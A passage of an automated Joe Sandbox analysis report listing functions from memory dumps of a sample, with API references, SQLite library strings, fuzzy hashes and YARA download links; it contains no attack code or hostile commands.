Opcode Fuzzy Hash: 4fa621a5acb3869c5dcd3ec986f9a0a95653d6ce99f2efc1e43eb0eaac12dd61
Instruction Fuzzy Hash: 5C115A72908129BBDF028F95CC48EEF3F7DEF01760F504248F928921A0D7719640CBA1

Function 1D732ABD Relevance: 6.0, APIs: 4, Instructions: 30COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 1D931382
GetLastError.KERNEL32 ref: 1D93138E
___initconout.LIBCMT ref: 1D93139E

Part of subcall function 1D931303: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 1D931316

WriteConsoleW.KERNEL32 ref: 1D9313B3

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID: ConsoleWrite$CreateErrorFileLast___initconout
String ID:
API String ID: 3431868840-0
Opcode ID: eb818d588504810ad6418e7e6d8bf2542e2f75438091ee7469b8548dc1041772
Instruction ID: 4135bcc3f708ae2bfc1b143a3d2d5c8fda4db8b2ebaa9adb7fe099e06bdf9489
Opcode Fuzzy Hash: eb818d588504810ad6418e7e6d8bf2542e2f75438091ee7469b8548dc1041772
Instruction Fuzzy Hash: 5AF0A736008535BBCF171FE5CC44A8E3F75FB092E2F058214FA1C95130CA3288609F85

Function 1D74BE80 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 1D74C1B5

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: 45656162d4a5d925a1615356c085ce5da77079d689b770f5ba569aaf540d9f56
Instruction ID: 4f0ae95a34ace9d16399c4ce0d0681d96c6cbb1742f4d77165f60a1c1c251f63
Opcode Fuzzy Hash: 45656162d4a5d925a1615356c085ce5da77079d689b770f5ba569aaf540d9f56
Instruction Fuzzy Hash: EBA129B55087868FD7068E288C40736B7E1AF89230F758B5EF9A5473F2E770D4858A83

Function 1D8B7300 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

-, xrefs: 1D8B7538
%!.15g, xrefs: 1D8B75C3

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %!.15g$-
API String ID: 0-583212262
Opcode ID: 5bd92987489ee5736d14eaaa9cdc9ec9b3e893998c8fff58669e41247ff344f5
Instruction ID: 681d829c9cee25442e0c44fa2aca9261ddd8988bd74141fcb226535a3fe1b0f4
Opcode Fuzzy Hash: 5bd92987489ee5736d14eaaa9cdc9ec9b3e893998c8fff58669e41247ff344f5
Instruction Fuzzy Hash: 03917B71A083468FD704DF6CD89175AFBE0ABC8314F48492DE989CB351E7B9D9098B92

Function 1D77CBF0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 1D77CE39

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: 21625147761cbaaa10963df0b874229035676f66834e07abc2467c68e91f42a4
Instruction ID: c4057cfb1592bb1fdd4f2d3243555ee89c8916c8629362d905bf6bdf5d7e9e5a
Opcode Fuzzy Hash: 21625147761cbaaa10963df0b874229035676f66834e07abc2467c68e91f42a4
Instruction Fuzzy Hash: 6D811175A083018FCB04CE19D889B6AB7E5BFC8334F154D5AFA85972A2E371E9448793

Function 1D8578F0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 214COMMON

Download Yara Rule

Strings

?, xrefs: 1D85794A
*, xrefs: 1D857982

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: *$?
API String ID: 0-2367018687
Opcode ID: e023c6158235a33aa884ffb4d52706b475d321342de70e414f553fd9cd2e00aa
Instruction ID: aaace0f8eccbf8ec0eda58f0dd2a83a557f8c3c88af88fd68f625747be0a66f7
Opcode Fuzzy Hash: e023c6158235a33aa884ffb4d52706b475d321342de70e414f553fd9cd2e00aa
Instruction Fuzzy Hash: 4771F770A083518FDB129F28CC8072BBBE6EF86610F54896DF9C987311D776D9458BA3

Function 1D74C8E0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 206COMMON

Download Yara Rule

Strings

ESCAPE expression must be a single character, xrefs: 1D74CA43
LIKE or GLOB pattern too complex, xrefs: 1D74C94F

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
API String ID: 0-264706735
Opcode ID: 97a4a89fe51c61db4582ff52ff5fcc0437b3e96a574f545f35036b90c6718503
Instruction ID: ecd1b084367d4a69032a6d4c635d2cb25523e30f5b80a420fbe0ca2d2e5b566d
Opcode Fuzzy Hash: 97a4a89fe51c61db4582ff52ff5fcc0437b3e96a574f545f35036b90c6718503
Instruction Fuzzy Hash: FD618831B09291AFDB0BCA14C881B7677D5AB41334F34C28AE4965B2E7D736D485C353

Function 1D74D0F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 1D74D213

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: 7955c80af7c585ebec609d2b8c2e6be45bfd8004617ffa75c505bbdd9fd13e42
Instruction ID: 8a25dc958d4e4fddd3d108d303f69f4cc390f109c7018576b1fe2e92e6929379
Opcode Fuzzy Hash: 7955c80af7c585ebec609d2b8c2e6be45bfd8004617ffa75c505bbdd9fd13e42
Instruction Fuzzy Hash: 07416E728083428FD7125A2C9C457AA7B95AF51330F26893DEDE5533E3E726E648C393

Function 1D7455D0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

winDelete, xrefs: 1D74569C
delayed %dms for lock/sharing conflict at line %d, xrefs: 1D7456D1

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
API String ID: 0-1405699761
Opcode ID: ff1ce5095c8f668de40b8f75415c503605bbc9692c9966878d62309e12968917
Instruction ID: 1f22f933566bc71fe345fc7e324cfd0dc3287715cd81173f7ac5057cd510489e
Opcode Fuzzy Hash: ff1ce5095c8f668de40b8f75415c503605bbc9692c9966878d62309e12968917
Instruction Fuzzy Hash: 75318072A042258BD7012E389DC8BBA7738E7427B1F224777E907C7551D725E444CEA3

Function 1D74D300 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 1D74D3D5

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: 9adfeed01e0fb2d91d4fdae51fe34eecee2256b8e3857181bbcfd4310c7767e2
Instruction ID: f40f614d51c3098bfd6c0306332067f4059e2674647186ca5e39841ffe404ee6
Opcode Fuzzy Hash: 9adfeed01e0fb2d91d4fdae51fe34eecee2256b8e3857181bbcfd4310c7767e2
Instruction Fuzzy Hash: 873150B2904215DBD7064A1CAC107B637599B82334F398259FDD56B3D3D367E906C293

Function 1D82DEE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON

Download Yara Rule

Strings

SELECT tbl,idx,stat FROM %Q.sqlite_stat1, xrefs: 1D82DF4F
sqlite_stat1, xrefs: 1D82DF30

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: SELECT tbl,idx,stat FROM %Q.sqlite_stat1$sqlite_stat1
API String ID: 0-3572622772
Opcode ID: 87cc047d9a78f966e0e345bcb66d99dc8db89cea5d9020ec75db92d7c480cc1a
Instruction ID: 8c450a31287e191bcb5f88bb66d28be161830d9013d5c9b374c2504ffc0c1530
Opcode Fuzzy Hash: 87cc047d9a78f966e0e345bcb66d99dc8db89cea5d9020ec75db92d7c480cc1a
Instruction Fuzzy Hash: 2E21D275A053459BCB10DE2DD8C0E7ABBA4EF81624F56412CFC489B261E330E844C7E7

Function 1D8C7E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

OsError 0x%lx (%lu), xrefs: 1D8C7ED9

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: OsError 0x%lx (%lu)
API String ID: 0-3720535092
Opcode ID: 28379a98c0c4f4ec12644cafadb29546270bff95468d58c0adb359d6ff5878b0
Instruction ID: 8349c7debecba5d0706319cafd7c8657adaf5c64484cbc6e4e8561a478f026f1
Opcode Fuzzy Hash: 28379a98c0c4f4ec12644cafadb29546270bff95468d58c0adb359d6ff5878b0
Instruction Fuzzy Hash: 3921C272608220EBEB006BA4DD88FAB37B8FF426D6F144668F905D6150DB35D910DFA3

Function 1D7687A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

ALTER TABLE %Q.'%q_node' RENAME TO "%w_node";ALTER TABLE %Q.'%q_parent' RENAME TO "%w_parent";ALTER TABLE %Q.'%q_rowid' RENAME TO "%w_rowid";, xrefs: 1D7687B9

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: ALTER TABLE %Q.'%q_node' RENAME TO "%w_node";ALTER TABLE %Q.'%q_parent' RENAME TO "%w_parent";ALTER TABLE %Q.'%q_rowid' RENAME TO "%w_rowid";
API String ID: 0-2843444156
Opcode ID: ee54880a83bc3c6e6420bd272d97a5b19a647624f2691bbdfb1b2eb21f2a3a54
Instruction ID: 93998331efa49a98a55019ec67b32159bc70e125a1d27810126fcb4abb6929ac
Opcode Fuzzy Hash: ee54880a83bc3c6e6420bd272d97a5b19a647624f2691bbdfb1b2eb21f2a3a54
Instruction Fuzzy Hash: E811ABB1614021BFE3109719EC89F777378EB852A2F044239F904D7250D728E855CAB6

Function 1D73141F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

GetXStateFeaturesMask, xrefs: 1D910E34
InitializeCriticalSectionEx, xrefs: 1D910E84

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: GetXStateFeaturesMask$InitializeCriticalSectionEx
API String ID: 0-4196971266
Opcode ID: b64c92d4af70955f3b7bd6b9acf852c6610dd3a7affef5549a36fd2fd01bbf5d
Instruction ID: a5c670d9ea2f0d8b66e852f53b14f3982e10550fe37514651f4c7175e3e2e2d5
Opcode Fuzzy Hash: b64c92d4af70955f3b7bd6b9acf852c6610dd3a7affef5549a36fd2fd01bbf5d
Instruction Fuzzy Hash: DE01843564417CB7DB126A91CC05EEE3E25FB827F1F014026FE1C2A221DA735860D6D2

Function 1D75F740 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';, xrefs: 1D75F752

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';
API String ID: 0-2071071404
Opcode ID: 391004f6524dfb2d2f40578c5efc6a022a7d1f4083ed75023a02ea31f663b118
Instruction ID: 2f3583a7297fb7870f07496f53af31b18b9f0187f15083077c1468e853f6b7e3
Opcode Fuzzy Hash: 391004f6524dfb2d2f40578c5efc6a022a7d1f4083ed75023a02ea31f663b118
Instruction Fuzzy Hash: E311A775504111AFE3005728ECC9F7B73BCEB462A5F40062AF905D6151EB64F844CA73

Function 1D765350 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

F, xrefs: 1D76539B

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 6e5832eb67d8997e47f5c6b16b4c335d78cb03d45d59dc8f217d71507943ebb3
Instruction ID: 88c87cc6975cf15a9f32977c08d1aa2a5bab45843ca9509e5884dab9529eb759
Opcode Fuzzy Hash: 6e5832eb67d8997e47f5c6b16b4c335d78cb03d45d59dc8f217d71507943ebb3
